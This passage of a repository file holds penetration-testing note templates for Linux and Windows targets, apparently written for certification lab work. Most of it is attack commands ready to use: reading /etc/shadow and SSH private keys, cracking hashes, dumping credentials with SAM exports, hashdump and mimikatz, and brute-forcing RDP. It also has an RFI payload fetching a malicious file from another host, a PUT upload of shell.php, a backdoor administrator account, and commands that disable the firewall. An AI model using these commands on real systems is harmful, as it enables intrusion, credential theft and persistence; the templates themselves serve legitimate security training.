/root/Desktop/Backup/Tools/Linux_privesc_tools/LinEnum.sh ./\n\npython linprivchecker.py extended\n./LinEnum.sh -t -k password\nunix-privesc-check\n```\n\n### Kernel exploits\n\n```\nsite:exploit-db.com kernel version\n\nperl /root/oscp/useful-tools/privesc/linux/Linux_Exploit_Suggester/Linux_Exploit_Suggester.pl -k 2.6\n\npython linprivchecker.py extended\n```\n\n### Programs running as root\n\nLook for webserver, mysql or anything else like that.\n\n```\n# Metasploit\nps\n\n# Linux\nps aux\n```\n\n### Installed software\n\n```\n/usr/local/\n/usr/local/src\n/usr/local/bin\n/opt/\n/home\n/var/\n/usr/src/\n\n# Debian\ndpkg -l\n\n# CentOS, OpenSuse, Fedora, RHEL\nrpm -qa (CentOS / openSUSE )\n\n# OpenBSD, FreeBSD\npkg_info\n```\n\n\n### Weak/reused/plaintext passwords\n\n- Check database config-file\n- Check databases\n- Check weak passwords\n\n```\nusername:username\nusername:username1\nusername:root\nusername:admin\nusername:qwerty\nusername:password\n```\n\n- Check plaintext\n\n```\n./LinEnum.sh -t -k password\n```\n\n### Inside service\n\n```\n# Linux\nnetstat -anlp\nnetstat -ano\n```\n\n### Suid misconfiguration\n\nBinary with suid permission can be run by anyone, but when they are run they are run as root!\n\nExample programs:\n\n```\nnmap\nvim\nnano\n```\n\n```\nfind / -perm -u=s -type f 2>/dev/null\n```\n\n\n### Unmounted filesystems\n\nHere we are looking for any unmounted filesystems. If we find one we mount it and start the priv-esc process over again.\n\n```\nmount -l\n```\n\n### Cronjob\n\nLook for anything that is owned by privileged user but writable for you\n\n```\ncrontab -l\nls -alh /var/spool/cron\nls -al /etc/ | grep cron\nls -al /etc/cron*\ncat /etc/cron*\ncat /etc/at.allow\ncat /etc/at.deny\ncat /etc/cron.allow\ncat /etc/cron.deny\ncat /etc/crontab\ncat /etc/anacrontab\ncat /var/spool/cron/crontabs/root\n```\n\n### SSH Keys\n\nCheck all home directories\n\n```\ncat ~/.ssh/authorized_keys\ncat ~/.ssh/identity.pub\ncat ~/.ssh/identity\ncat ~/.ssh/id_rsa.pub\ncat ~/.ssh/id_rsa\ncat ~/.ssh/id_dsa.pub\ncat ~/.ssh/id_dsa\ncat /etc/ssh/ssh_config\ncat /etc/ssh/sshd_config\ncat /etc/ssh/ssh_host_dsa_key.pub\ncat /etc/ssh/ssh_host_dsa_key\ncat /etc/ssh/ssh_host_rsa_key.pub\ncat /etc/ssh/ssh_host_rsa_key\ncat /etc/ssh/ssh_host_key.pub\ncat /etc/ssh/ssh_host_key\n```\n\n\n### Bad path configuration\n\nRequire user interaction\n\n\n\n\n\n------------------------------------------------------------------------\n\n\n\n\n----------------------------- LOOT LOOT LOOT LOOT ----------------------\n\n\n\n\n------------------------------------------------------------------------\n\n\n## Loot\n\n**Checklist**\n\n- Proof:\n- Network secret:\n- Passwords and hashes:\n- Dualhomed:\n- Tcpdump:\n- Interesting files:\n- Databases:\n- SSH-keys:\n- Browser:\n- Mail:\n\n\n### Proof\n\n```\n/root/proof.txt\n```\n\n### Network secret\n\n```\n/root/network-secret.txt\n```\n\n### Passwords and hashes\n\n```\ncat /etc/passwd\ncat /etc/shadow\n\nunshadow passwd shadow > unshadowed.txt\njohn --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt\n```\n\n### Dualhomed\n\n```\nifconfig\nifconfig -a\narp -a\n```\n\n### Tcpdump\n\n```\ntcpdump -i any -s0 -w capture.pcap\ntcpdump -i eth0 -w capture -n -U -s 0 src not 192.168.1.X and dst not 192.168.1.X\ntcpdump -vv -i eth0 src not 192.168.1.X and dst not 192.168.1.X\n```\n\n### Interesting files\n\n```\n#Meterpreter\nsearch -f *.txt\nsearch -f *.zip\nsearch -f *.doc\nsearch -f *.xls\nsearch -f config*\nsearch -f *.rar\nsearch -f *.docx\nsearch -f *.sql\n\n.ssh:\n.bash_history\n```\n\n### Databases\n\n### SSH-Keys\n\n### Browser\n\n### Mail\n\n```\n/var/mail\n/var/spool/mail\n```\n\n### GUI\nIf there is a gui we want to check out the browser.\n\n```\necho $DESKTOP_SESSION\necho $XDG_CURRENT_DESKTOP\necho $GDMSESSION\n```\n\n## How to replicate:\n" }, { "path": "templates/windows-template.md", "content": "## Info-sheet\n\n\n- DNS-Domain name:\n- Host name:\n- OS:\n- Server:\n- Workgroup:\n- Windows domain:\n- Services and ports:\n\nINSERTTCPSCAN\n\n\n## Recon\n\n```\nAlways start with a stealthy scan to avoid closing ports.\n\n# Syn-scan\nnmap -sS INSERTIPADDRESS\n\n# Service-version, default scripts, OS:\nnmap INSERTIPADDRESS -sV -sC -O\n\n# Scan all ports, might take a while.\nnmap INSERTIPADDRESS -p-\n\n# Scan for UDP\nnmap INSERTIPADDRESS -sU\nunicornscan -mU -v -I INSERTIPADDRESS\n\n# Connect to udp if one is open\nnc -u INSERTIPADDRESS 48772\n\n# Monster scan\nnmap INSERTIPADDRESS -p- -A -T4 -sC\n```\n\n\n### Port 21 - FTP\n\n- Name:\n- Version:\n- Anonymous login:\n\nINSERTFTPTEST\n\n```\nnmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS\n```\n\n### Port 22 - SSH\n\n- Name:\n- Version:\n- Protocol:\n- RSA-key-fingerprint:\n- Takes-password:\nIf you have usernames test login with username:username\n\nINSERTSSHCONNECT\n\n\n### Port 25\n\n- Name:\n- Version:\n- VRFY:\n- EXPN:\n\nINSERTSMTPCONNECT\n\n```\nnc -nvv INSERTIPADDRESS 25\nHELO foo\n\nnmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 INSERTIPADDRESS\n```\n\n### Port 110 - Pop3\n\n- Name:\n- Version:\n\nINSERTPOP3CONNECT\n\n### Port 135 - MSRPC\n\nSome versions are vulnerable.\n\n```\nnmap INSERTIPADDRESS --script=msrpc-enum\n```\n\nExploit:\n\n```\nmsf > use exploit/windows/dcerpc/ms03_026_dcom\n```\n\n### Port 139/445 - SMB\n\n- Name:\n- Version:\n- Domain/workgroup name:\n- Domain-sid:\n- Allows unauthenticated login:\n\n\n```\nnmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse INSERTIPADDRESS -p 445\n\nenum4linux -a INSERTIPADDRESS\n\nrpcclient -U \"\" INSERTIPADDRESS\n\tsrvinfo\n\tenumdomusers\n\tgetdompwinfo\n\tquerydominfo\n\tnetshareenum\n\tnetshareenumall\n\nsmbclient -L INSERTIPADDRESS\nsmbclient //INSERTIPADDRESS/tmp\nsmbclient \\\\\\\\INSERTIPADDRESS\\\\ipc$ -U john\nsmbclient //INSERTIPADDRESS/ipc$ -U john\nsmbclient //INSERTIPADDRESS/admin$ -U john\n\nLog in with shell:\nwinexe -U username //INSERTIPADDRESS \"cmd.exe\" --system\n\n```\n\n### Port 161/162 UDP - SNMP\n\n\n```\nnmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes INSERTIPADDRESS\nsnmp-check -t INSERTIPADDRESS -c public\n```\n\n```\n# Common community strings\npublic\nprivate\ncommunity\n```\n\n\n\n### Port 554 - RTSP\n\n\n### Port 1030/1032/1033/1038\n\nUsed by RPC to connect in domain network. Usually nothing.\n\n### Port 1433 - MSSQL\n\n- Version:\n\n```\nuse auxiliary/scanner/mssql/mssql_ping\n\n# Last options. Brute force.\nscanner/mssql/mssql_login\n\n# Log in to mssql\nsqsh -S INSERTIPADDRESS -U sa\n\n# Execute commands\nxp_cmdshell 'date'\ngo\n```\n\nIf you have credentials look in metasploit for other modules.\n\n## Port 1521 - Oracle\n\nName:\nVersion:\nPassword protected:\n\n```\ntnscmd10g version -h INSERTIPADDRESS\ntnscmd10g status -h INSERTIPADDRESS\n```\n\n\n### Port 2100 - Oracle XML DB\n\nCan be accessed through ftp.\nSome default passwords here: https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm\n- Name:\n- Version:\n\nDefault logins:\n\n```\nsys:sys\nscott:tiger\n```\n\n### Port 2049 - NFS\n\n```\nshowmount -e INSERTIPADDRESS\n\nIf you find anything you can mount it like this:\n\nmount INSERTIPADDRESS:/ /tmp/NFS\nmount -t INSERTIPADDRESS:/ /tmp/NFS\n```\n\n### 3306 - MySQL\n\n- Name:\n- Version:\n\n```\nmysql --host=INSERTIPADDRESS -u root -p\n\nnmap -sV -Pn -vv -script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 INSERTIPADDRESS -p 3306\n```\n\n### Port 3339 - Oracle web interface\n\n- Basic info about web service (apache, nginx, IIS)\n- Server:\n- Scripting language:\n- Apache Modules:\n- IP-address:\n- Domain-name address:\n\n### Port 3389 - Remote desktop\n\nTest logging in to see what OS is running\n\n```\nrdesktop -u guest -p guest INSERTIPADDRESS -g 94%\n\n# Brute force\nncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS\n```\n\n\n### Port 80\n\n- Server:\n- Scripting language:\n- Apache Modules:\n- Domain-name address:\n\nINSERTCURLHEADER\n\n\n- Web application\n- Name:\n- Version:\n\n```\n# Nikto\nnikto -h http://INSERTIPADDRESS\n\n# Nikto with squid proxy\nnikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444\n\n# Get header\ncurl -i INSERTIPADDRESS\n\n# Get everything\ncurl -i -L INSERTIPADDRESS\n\n# Check if it is possible to upload using put\ncurl -v -X OPTIONS http://INSERTIPADDRESS/\ncurl -v -X PUT -d '' http://INSERTIPADDRESS/test/shell.php\n\n# Check for title and all links\ndotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix\n```\n\n\n#### Nikto scan\n\n\nINSERTNIKTOSCAN\n\n\n\n#### Url brute force\n\n\n\n```\n# Dirb\ndirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt\n\n# Gobuster - remove relevant responde codes (403 for example)\ngobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e\n```\n\nINSERTDIRBSCAN\n\n\n#### Default/Weak login\n\nGoogle documentation for default passwords and test them:\n\n```\nsite:webapplication.com password\n```\n\n```\nadmin admin\nadmin password\nadmin \nadmin nameofservice\nroot root\nroot admin\nroot password\nroot nameofservice\n password\n admin\n username\n nameofservice\n```\n\n#### LFI/RFI\n\n```\n# Kadimus\n/root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page=\n\n\n# Bypass execution\nhttp://INSERTIPADDRESS/index.php?page=php://filter/convert.base64-encode/resource=index\nbase64 -d savefile.php\n\n# Bypass extension\nhttp://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt%00\nhttp://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt?\n```\n\n\n#### SQL-Injection\n\n```\n# Post\n./sqlmap.py -r search-test.txt -p tfUPass\n\n# Get\nsqlmap -u \"http://INSERTIPADDRESS/index.php?id=1\" --dbms=mysql\n\n# Crawl\nsqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3\n```\n\n#### Sql-login-bypass\n\n\n- Open Burp-suite\n- Make and intercept request\n- Send to intruder\n- Cluster attack\n- Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html)\n- Attack\n- Check for response length variation\n\n### Password brute force - last resort\n\n```\ncewl\n```\n\n### Port 443 - HTTPS\n\nHeartbleed:\n\n```\nsslscan INSERTIPADDRESS:443\n```\n\n## Vulnerability analysis\n\nNow we have gathered information about the system. Now comes the part where we look for exploits and vulnerabilities and features.\n\n### To try - List of possibilities\nAdd possible exploits here:\n\n\n### Find sploits - Searchsploit and google\n\nWhere there are many exploits for a software, use google. It will automatically sort it by popularity.\n\n```\nsite:exploit-db.com apache 2.4.7\n\n# Remove dos-exploits\n\nsearchsploit Apache 2.4.7 | grep -v '/dos/'\nsearchsploit Apache | grep -v '/dos/' | grep -vi \"tomcat\"\n\n# Only search the title (exclude the path), add the -t\nsearchsploit -t Apache | grep -v '/dos/'\n```\n\n\n\n----------------------------------------------------------------------------\n\n\n\n'''''''''''''''''''''''''''''''''' PRIVESC '''''''''''''''''''''''''''''''''\n\n\n\n-----------------------------------------------------------------------------\n\n\n## Privilege escalation\n\nNow we start the whole enumeration-process over gain. This is a checklist. You need to check of every single one, in this order.\n\n- Kernel exploits\n- Cleartext password\n- Reconfigure service parameters\n- Inside service\n- Program running as root\n- Installed software\n- Scheduled tasks\n- Weak passwords\n\n\n\n### To-try list\nHere you will add all possible leads. What to try.\n\n\n### Basic info\n\n- OS:\n- Version:\n- Architecture:\n- Current user:\n- Hotfixes:\n- Antivirus:\n\n**Users:**\n\n**Localgroups:**\n\n```\nsysteminfo\nset\nhostname\nnet users\nnet user user1\nnet localgroups\naccesschk.exe -uwcqv \"Authenticated Users\" *\n\nnetsh firewall show state\nnetsh firewall show config\n\n# Set path\nset PATH=%PATH%;C:\\xampp\\php\n```\n\n\n### Kernel exploits\n\n\n```\n# Look for hotfixes\nsysteminfo\n\nwmic qfe get Caption,Description,HotFixID,InstalledOn\n\n# Search for exploits\nsite:exploit-db.com windows XX XX\n```\n\n\n### Cleartext passwords\n\n```\n# Windows autologin\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon\"\n\n# VNC\nreg query \"HKCU\\Software\\ORL\\WinVNC3\\Password\"\n\n# SNMP Parameters\nreg query \"HKLM\\SYSTEM\\Current\\ControlSet\\Services\\SNMP\"\n\n# Putty\nreg query \"HKCU\\Software\\SimonTatham\\PuTTY\\Sessions\"\n\n# Search for password in registry\nreg query HKLM /f password /t REG_SZ /s\nreg query HKCU /f password /t REG_SZ /s\n```\n\n\n### Reconfigure service parameters\n\n- Unquoted service paths\n\nCheck book for instructions\n\n- Weak service permissions\n\nCheck book for instructions\n\n### Inside service\n\nCheck netstat to see what ports are open from outside and from inside. Look for ports only available on the inside.\n\n```\n# Meterpreter\nrun get_local_subnets\n\nnetstat /a\nnetstat -ano\n```\n\n### Programs running as root/system\n\n\n\n### Installed software\n\n```\n# Metasploit\nps\n\ntasklist /SVC\nnet start\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\nDRIVERQUERY\n\nLook in:\nC:\\Program files\nC:\\Program files (x86)\nHome directory of the user\n```\n\n\n### Scheduled tasks\n\n```\nschtasks /query /fo LIST /v\n\nCheck this file:\nc:\\WINDOWS\\SchedLgU.Txt\n```\n\n### Weak passwords\n\nRemote desktop\n\n```\nncrack -vv --user george -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS\n```\n\n### Useful commands\n\n\n**Add user and enable RDP**\n\n```\nnet user haxxor Haxxor123 /add\nnet localgroup Administrators haxxor /add\nnet localgroup \"Remote Desktop Users\" haxxor /ADD\n\n# Enable RDP\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\n\nTurn firewall off\nnetsh firewall set opmode disable\n\nOr like this\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\n\nIf you get this error:\n\n\"ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?\nFailed to connect, CredSSP required by server.\"\"\n\nAdd this reg key:\n\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f\n```\n\n\n\n------------------------------------------------------------------------\n\n\n\n\n----------------------------- LOOT LOOT LOOT LOOT -------------------\n\n\n\n\n------------------------------------------------------------------------\n\n\n## Loot\n\n- Proof:\n- Network secret:\n- Password and hashes:\n- Dualhomed:\n- Tcpdump:\n- Interesting files:\n- Databases:\n- SSH-keys:\n- Browser:\n\n### Proof\n\n### Network secret\n\n### Passwords and hashes\n\n```\nwce32.exe -w\nwce64.exe -w\nfgdump.exe\n\nreg.exe save hklm\\sam c:\\sam_backup\nreg.exe save hklm\\security c:\\security_backup\nreg.exe save hklm\\system c:\\system\n\n# Meterpreter\nhashdump\nload mimikatz\nmsv\n```\n\n### Dualhomed\n\n```\nipconfig /all\nroute print\n\n# What other machines have been connected\narp -a\n```\n\n### Tcpdump\n\n```\n# Meterpreter\nrun packetrecorder -li\nrun packetrecorder -i 1\n```\n\n### Interesting files\n\n```\n#Meterpreter\nsearch -f *.txt\nsearch -f *.zip\nsearch -f *.doc\nsearch -f *.xls\nsearch -f config*\nsearch -f *.rar\nsearch -f *.docx\nsearch -f *.sql\n\n# How to cat files in meterpreter\ncat c:\\\\Inetpub\\\\iissamples\\\\sdk\\\\asp\\\\components\\\\adrot.txt\n\n# Recursive search\ndir /s\n```\n\n### Mail\n\n### Browser\n\n- Browser start-page:\n- Browser-history:\n- Saved passwords:\n\n### Databases\n\n### SSH-keys\n\n## How to replicate:\n" } ]